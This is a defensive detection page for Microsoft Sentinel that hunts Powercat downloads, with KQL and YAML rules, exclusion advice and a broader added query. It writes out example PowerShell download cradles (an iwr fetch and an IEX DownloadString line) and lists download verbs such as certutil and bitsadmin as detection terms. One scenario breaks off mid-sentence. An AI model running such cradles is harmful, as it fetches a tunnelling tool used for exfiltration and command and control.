Command lines that download or invoke Powercat, a PowerShell port of netcat, point to an adversary staging a channel for data exfiltration or command and control over PowerShell. SOC teams should hunt for this behaviour in Azure Sentinel (now Microsoft Sentinel) so that an intrusion is caught at the tooling stage, before data leaves the network.
KQL Query

```kql
imProcessCreate
| where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe")
| where CommandLine hassuffix "powercat.ps1"
| extend timestamp = TimeGenerated, AccountCustomEntity = User, HostCustomEntity = Dvc
```
```yaml
id: 4846436d-5183-4a33-a975-fc892ffea91d
name: Powercat Download (Normalized Process Events)
description: |
  'Powercat is a PowerShell implementation of netcat. Whilst it can be used as a legitimate administrative tool it can be abused by attackers to exfiltrate data. This query looks for command line activity downloading PowerCat.'
requiredDataConnectors:
  - connectorId: SecurityEvents
    dataTypes:
      - SecurityEvent
tactics:
  - Exfiltration
relevantTechniques:
  - T1011
query: |
  imProcessCreate
  | where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe")
  | where CommandLine hassuffix "powercat.ps1"
  | extend timestamp = TimeGenerated, AccountCustomEntity = User, HostCustomEntity = Dvc
entityMappings:
  - entityType: Account
    fieldMappings:
      - identifier: FullName
        columnName: AccountCustomEntity
  - entityType: Host
    fieldMappings:
      - identifier: FullName
        columnName: HostCustomEntity
```
| Sentinel Table | Notes |
|---|---|
| imProcessCreate | ASIM ProcessEvent parser, not a raw table: at least one underlying source such as the SecurityEvents connector above must be enabled. For Windows Security Event 4688 the CommandLine field is empty unless the "Include command line in process creation events" audit policy is turned on, in which case this rule matches nothing. |
Scenario: Legitimate PowerShell Script Execution
Description: A system administrator runs a legitimate PowerShell script through powershell.exe for routine maintenance or configuration.
Filter/Exclusion: Ordinary maintenance scripts only match this rule if their command line actually references powercat.ps1, so generic PowerShell activity is not a false positive here. Where an approved script does wrap Powercat, exclude on the imProcessCreate field ParentProcessName together with the full script path on the approved hosts, not on the interpreter alone. A path under C:\Windows\System32\ is not a trust signal by itself, and eventvwr.exe as the parent of PowerShell should never be exempted: that pairing is a known UAC-bypass pattern rather than normal administration.
Scenario: Scheduled Job Running Powercat for Network Monitoring
Description: A scheduled task runs a PowerShell script that uses Powercat to check connectivity between hosts.
Filter/Exclusion: Exclude that one task, identified by its ParentProcessName (the Task Scheduler service host), the exact script path in CommandLine and the hosts it is approved on. Do not exclude on free-text keywords such as "monitor" or "test": an attacker can add those words to their own command line. Tools such as tcping or Test-NetConnection never reference powercat.ps1 and so never match this rule in the first place.
Scenario: Admin Task Using Powercat for Remote Management
Description: An IT admin uses Powercat to reach a server remotely, for example to open a shell or transfer files.
Filter/Exclusion: Do not exclude on privileged accounts. An attacker who has obtained Administrator is exactly the case the rule exists to catch, and exempting that account blinds the rule to the highest-impact activity. Instead, allowlist the specific account and source-host pair (for example in a watchlist) and lower the severity rather than dropping the event. Note that mstsc.exe is the RDP client on the operator's workstation and is not the parent of PowerShell on the managed server, and that PowerShell Remoting activity on the server appears under wsmprovhost.exe, so exempting it wholesale also exempts lateral movement over WinRM.
Scenario: Powercat Used for Internal Tooling
Description: A company has an internal tool built on Powercat for communication or data transfer between servers.
Filter/Exclusion: Record the tool's installed path, file hash and the hosts it runs on in a watchlist, and exclude only when CommandLine contains that path on one of those hosts. A bare process or script name (e.g., internal-tool.exe) is trivially spoofed and is not a safe exclusion key on its own.
Scenario: Powercat Used for Secure File Transfer
Description: A DevOps team is using Powercat as
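The published query matches only command lines that end in "powercat.ps1", so a fetch such as `iwr https://.../powercat.ps1 -OutFile powercat.ps1` is caught, but a one-liner cradle ending in `')` like `IEX (New-Object Net.WebClient).DownloadString('https://.../powercat.ps1')` is not, and a later call to the loaded `powercat` function is never matched. The query below is an added example, not the published rule, showing a broader whole-term match plus the kind of exclusions the scenarios above ask for: keyed on host and script path rather than on user or free-text keywords. The host name, script path and watchlist name are placeholders, and pwsh.exe is an addition to the original interpreter list.

```kql
// Added example (not the published rule). Broadens the match beyond the exact
// suffix and adds exclusions keyed on attributes the operator controls.
// ApprovedHosts / ApprovedScriptPath are constructed placeholders; in a real
// workspace source them from a watchlist, e.g. _GetWatchlist('PowercatAllowlist').
let ApprovedHosts = dynamic(["devops-jump01.corp.example"]);
let ApprovedScriptPath = @"C:\Tools\Approved\powercat.ps1";
// Verbs that commonly appear in PowerShell download cradles.
let DownloadVerbs = dynamic(["DownloadString", "DownloadFile", "WebRequest", "iwr", "curl", "wget", "bitsadmin", "certutil", "BitsTransfer"]);
imProcessCreate
| where TimeGenerated > ago(14d)
// pwsh.exe (PowerShell 7) is added to the original interpreter list.
| where Process has_any ("cmd.exe", "powershell.exe", "pwsh.exe", "PowerShell_ISE.exe")
// 'has' is a whole-term match, so "powercat" hits powercat.ps1 anywhere in the
// line and also a later call to the loaded powercat function.
| where CommandLine has "powercat"
// Separate the fetch from the use of an already-present copy for triage.
| extend Stage = iff(CommandLine has_any (DownloadVerbs), "download", "invoke")
// Exclude only an approved host running the approved script path. A host alone,
// a user alone or a keyword an attacker can type is not a safe exclusion key.
| where not(Dvc in~ (ApprovedHosts) and CommandLine contains ApprovedScriptPath)
| extend timestamp = TimeGenerated, AccountCustomEntity = User, HostCustomEntity = Dvc
| project timestamp, HostCustomEntity, AccountCustomEntity, ParentProcessName, Process, Stage, CommandLine
```

ParentProcessName is projected so an analyst can tell a scheduled task or a wsmprovhost.exe remoting session apart from an interactive shell without building those judgements into the exclusion itself.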